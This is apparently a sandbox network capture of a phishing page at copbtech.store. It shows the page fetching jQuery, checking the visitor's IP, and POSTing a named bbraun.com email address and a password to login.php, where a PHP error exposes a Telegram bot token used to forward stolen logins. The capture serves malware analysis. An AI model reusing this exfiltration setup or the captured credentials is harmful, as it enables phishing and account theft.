2025-01-22 11:02:31 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-01-22 11:02:31 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-01-22 11:02:31 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2025-01-22 11:02:31 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-01-22 11:02:31 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49759	151.101.66.137	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:32 UTC	358	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:32 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Wed, 22 Jan 2025 11:02:32 GMT Age: 1294349 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740043-EWR X-Cache: HIT, HIT X-Cache-Hits: 4188, 3 X-Timer: S1737543752.219294,VS0,VE0 Vary: Accept-Encoding
2025-01-22 11:02:32 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-01-22 11:02:32 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-01-22 11:02:32 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-01-22 11:02:32 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2025-01-22 11:02:32 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-01-22 11:02:32 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:32 UTC	123	IN	HTTP/1.1 408 Request Time-out Content-length: 110 Cache-Control: no-cache Connection: close Content-Type: text/html
2025-01-22 11:02:32 UTC	110	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49764	104.26.13.205	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:32 UTC	542	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:33 UTC	463	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:02:33 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 905f0d6879448cb4-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1813&rtt_var=687&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1120&delivery_rate=1584373&cwnd=189&unsent_bytes=0&cid=10a32c56b5f339da&ts=132&x=0"
2025-01-22 11:02:33 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49766	172.67.74.152	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:33 UTC	349	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:33 UTC	430	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:02:33 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 905f0d6d291243ca-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1617&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=927&delivery_rate=1805813&cwnd=223&unsent_bytes=0&cid=5908bc039d905680&ts=138&x=0"
2025-01-22 11:02:33 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49770	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:41 UTC	633	OUT	POST /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive Content-Length: 33 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:41 UTC	33	OUT	Data Raw: 61 69 3d 61 6e 6e 61 2e 64 75 65 72 6b 73 65 6e 25 34 30 62 62 72 61 75 6e 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=anna.duerksen%40bbraun.com&pr=
2025-01-22 11:02:42 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=ofrnhq9qj0h0pgujlmovte7l6b; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Wed, 22 Jan 2025 11:02:42 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:02:42 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49771	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:43 UTC	355	OUT	GET /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:44 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Wed, 22 Jan 2025 11:02:44 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:02:44 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49772	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:49 UTC	633	OUT	POST /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive Content-Length: 51 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:49 UTC	51	OUT	Data Raw: 61 69 3d 61 6e 6e 61 2e 64 75 65 72 6b 73 65 6e 25 34 30 62 62 72 61 75 6e 2e 63 6f 6d 26 70 72 3d 77 21 25 37 44 5a 4c 79 55 5f 51 63 67 6f 68 77 49 51 Data Ascii: ai=anna.duerksen%40bbraun.com&pr=w!%7DZLyU_QcgohwIQ
2025-01-22 11:03:06 UTC	571	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=t1a74d1s8o0tdfffvc0p4fqt0u; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 900 date: Wed, 22 Jan 2025 11:03:06 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:03:06 UTC	900	IN	Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 37 35 35 37 34 31 32 36 39 39 3a 41 41 48 6c 6b 42 32 6c 5a 69 50 49 6d 74 45 51 71 4a 77 4c 68 68 37 6e 55 68 69 71 76 36 48 35 6e 69 63 2f 73 65 6e 64 4d 65 73 73 61 67 65 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 48 54 54 50 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 21 20 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 63 6f 70 62 6c 77 68 69 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 74 73 6b 2f 78 6c 73 2f 6c 6f 67 69 6e 2e 70 68 70 3c 2f 62 Data Ascii: <br /><b>Warning</b>: file_get_contents(https://api.telegram.org/bot7557412699:AAHlkB2lZiPImtEQqJwLhh7nUhiqv6H5nic/sendMessage): Failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in <b>/home/copblwhi/public_html/tsk/xls/login.php</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49785	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

